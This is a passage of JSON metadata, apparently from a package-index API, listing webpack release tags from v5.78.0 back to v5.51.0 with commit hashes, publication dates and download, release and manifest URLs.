k/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.